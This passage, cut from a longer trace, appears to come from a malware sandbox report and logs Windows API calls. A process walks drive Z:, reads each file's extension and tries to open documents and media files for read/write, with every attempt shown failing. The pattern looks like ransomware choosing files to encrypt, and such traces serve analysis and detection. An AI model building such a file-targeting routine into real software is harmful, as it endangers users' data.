ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6825, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5IlHsHHuj.flv", cAlternateFileName="")) returned 1 [0182.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.051] PathFindExtensionW (pszPath="Z:\\5IlHsHHuj.flv") returned=".flv" [0182.057] CreateFileW (lpFileName="Z:\\5IlHsHHuj.flv" (normalized: "z:\\5ilhshhuj.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.058] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x18042, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YfrMVx7qN.pdf", cAlternateFileName="")) returned 1 [0182.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.059] PathFindExtensionW (pszPath="Z:\\YfrMVx7qN.pdf") returned=".pdf" [0182.064] CreateFileW (lpFileName="Z:\\YfrMVx7qN.pdf" (normalized: "z:\\yfrmvx7qn.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.065] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17472, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X9DJzkehG84l5iXYb.rtf", cAlternateFileName="")) returned 1 [0182.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.065] PathFindExtensionW (pszPath="Z:\\X9DJzkehG84l5iXYb.rtf") returned=".rtf" [0182.071] CreateFileW (lpFileName="Z:\\X9DJzkehG84l5iXYb.rtf" (normalized: "z:\\x9djzkehg84l5ixyb.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.072] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26675040, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x113a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="arFxCRPaJOfVUXqGPh.pps", cAlternateFileName="")) returned 1 [0182.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.072] PathFindExtensionW (pszPath="Z:\\arFxCRPaJOfVUXqGPh.pps") returned=".pps" [0182.077] CreateFileW (lpFileName="Z:\\arFxCRPaJOfVUXqGPh.pps" (normalized: "z:\\arfxcrpajofvuxqgph.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.079] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb72e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hzFXuXTiFAk.mp4", cAlternateFileName="")) returned 1 [0182.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.079] PathFindExtensionW (pszPath="Z:\\hzFXuXTiFAk.mp4") returned=".mp4" [0182.084] CreateFileW (lpFileName="Z:\\hzFXuXTiFAk.mp4" (normalized: "z:\\hzfxuxtifak.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.085] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x86a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HQARGMXmC2WYy.pdf", cAlternateFileName="")) returned 1 [0182.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.086] PathFindExtensionW (pszPath="Z:\\HQARGMXmC2WYy.pdf") returned=".pdf" [0182.091] CreateFileW (lpFileName="Z:\\HQARGMXmC2WYy.pdf" (normalized: "z:\\hqargmxmc2wyy.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.092] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x167a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yusqqOM7hYB90.xlsx", cAlternateFileName="")) returned 1 [0182.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.092] PathFindExtensionW (pszPath="Z:\\yusqqOM7hYB90.xlsx") returned=".xlsx" [0182.097] CreateFileW (lpFileName="Z:\\yusqqOM7hYB90.xlsx" (normalized: "z:\\yusqqom7hyb90.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.099] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x112b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I5MGz.gif", cAlternateFileName="")) returned 1 [0182.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.099] PathFindExtensionW (pszPath="Z:\\I5MGz.gif") returned=".gif" [0182.104] CreateFileW (lpFileName="Z:\\I5MGz.gif" (normalized: "z:\\i5mgz.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.105] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa877, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rbURuD4ORn2Eem6rs.jpg", cAlternateFileName="")) returned 1 [0182.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.105] PathFindExtensionW (pszPath="Z:\\rbURuD4ORn2Eem6rs.jpg") returned=".jpg" [0182.111] CreateFileW (lpFileName="Z:\\rbURuD4ORn2Eem6rs.jpg" (normalized: "z:\\rburud4orn2eem6rs.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.112] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x7b24, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VTE95H0m59pDCT9UO1IX.docx", cAlternateFileName="")) returned 1 [0182.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.112] PathFindExtensionW (pszPath="Z:\\VTE95H0m59pDCT9UO1IX.docx") returned=".docx" [0182.117] CreateFileW (lpFileName="Z:\\VTE95H0m59pDCT9UO1IX.docx" (normalized: "z:\\vte95h0m59pdct9uo1ix.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.119] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x96af, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HYsyB74UdGWE4jIKpy9E.xlsx", cAlternateFileName="")) returned 1 [0182.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.119] PathFindExtensionW (pszPath="Z:\\HYsyB74UdGWE4jIKpy9E.xlsx") returned=".xlsx" [0182.124] CreateFileW (lpFileName="Z:\\HYsyB74UdGWE4jIKpy9E.xlsx" (normalized: "z:\\hysyb74udgwe4jikpy9e.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.125] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13a81, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="455kYjCp7KIYqdl.gif", cAlternateFileName="")) returned 1 [0182.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.125] PathFindExtensionW (pszPath="Z:\\455kYjCp7KIYqdl.gif") returned=".gif" [0182.130] CreateFileW (lpFileName="Z:\\455kYjCp7KIYqdl.gif" (normalized: "z:\\455kyjcp7kiyqdl.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.132] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbf5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F1p7Wn.swf", cAlternateFileName="")) returned 1 [0182.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.132] PathFindExtensionW (pszPath="Z:\\F1p7Wn.swf") returned=".swf" [0182.141] CreateFileW (lpFileName="Z:\\F1p7Wn.swf" (normalized: "z:\\f1p7wn.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.143] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9039, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SDdqr3L6NGsiR8gSS.png", cAlternateFileName="")) returned 1 [0182.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.143] PathFindExtensionW (pszPath="Z:\\SDdqr3L6NGsiR8gSS.png") returned=".png" [0182.147] CreateFileW (lpFileName="Z:\\SDdqr3L6NGsiR8gSS.png" (normalized: "z:\\sddqr3l6ngsir8gss.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.150] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13821, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eDeo4.wav", cAlternateFileName="")) returned 1 [0182.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.150] PathFindExtensionW (pszPath="Z:\\eDeo4.wav") returned=".wav" [0182.154] CreateFileW (lpFileName="Z:\\eDeo4.wav" (normalized: "z:\\edeo4.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.155] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13fca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EYzpuUkMw0nV.m4a", cAlternateFileName="")) returned 1 [0182.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.155] PathFindExtensionW (pszPath="Z:\\EYzpuUkMw0nV.m4a") returned=".m4a" [0182.159] CreateFileW (lpFileName="Z:\\EYzpuUkMw0nV.m4a" (normalized: "z:\\eyzpuukmw0nv.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.166] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x742f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D91tIUAsFS.mkv", cAlternateFileName="")) returned 1 [0182.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.166] PathFindExtensionW (pszPath="Z:\\D91tIUAsFS.mkv") returned=".mkv" [0182.170] CreateFileW (lpFileName="Z:\\D91tIUAsFS.mkv" (normalized: "z:\\d91tiuasfs.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.171] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1586e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y4KxErTVQYWoCrSXjxG.odt", cAlternateFileName="")) returned 1 [0182.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.171] PathFindExtensionW (pszPath="Z:\\y4KxErTVQYWoCrSXjxG.odt") returned=".odt" [0182.175] CreateFileW (lpFileName="Z:\\y4KxErTVQYWoCrSXjxG.odt" (normalized: "z:\\y4kxertvqywocrsxjxg.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.176] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x138c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D3bOsFLtbMJgWgQv8Xrs.m4a", cAlternateFileName="")) returned 1 [0182.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.176] PathFindExtensionW (pszPath="Z:\\D3bOsFLtbMJgWgQv8Xrs.m4a") returned=".m4a" [0182.179] CreateFileW (lpFileName="Z:\\D3bOsFLtbMJgWgQv8Xrs.m4a" (normalized: "z:\\d3bosfltbmjgwgqv8xrs.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.180] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc139, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VBDptFA1xz7efpLkn.mp4", cAlternateFileName="")) returned 1 [0182.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.180] PathFindExtensionW (pszPath="Z:\\VBDptFA1xz7efpLkn.mp4") returned=".mp4" [0182.184] CreateFileW (lpFileName="Z:\\VBDptFA1xz7efpLkn.mp4" (normalized: "z:\\vbdptfa1xz7efplkn.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.185] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xafe5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JmVSFmaxSYp.wav", cAlternateFileName="")) returned 1 [0182.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.185] PathFindExtensionW (pszPath="Z:\\JmVSFmaxSYp.wav") returned=".wav" [0182.189] CreateFileW (lpFileName="Z:\\JmVSFmaxSYp.wav" (normalized: "z:\\jmvsfmaxsyp.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.190] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15403, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WwFhNksqnjKFSaL.doc", cAlternateFileName="")) returned 1 [0182.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.190] PathFindExtensionW (pszPath="Z:\\WwFhNksqnjKFSaL.doc") returned=".doc" [0182.194] CreateFileW (lpFileName="Z:\\WwFhNksqnjKFSaL.doc" (normalized: "z:\\wwfhnksqnjkfsal.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.195] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x18342, 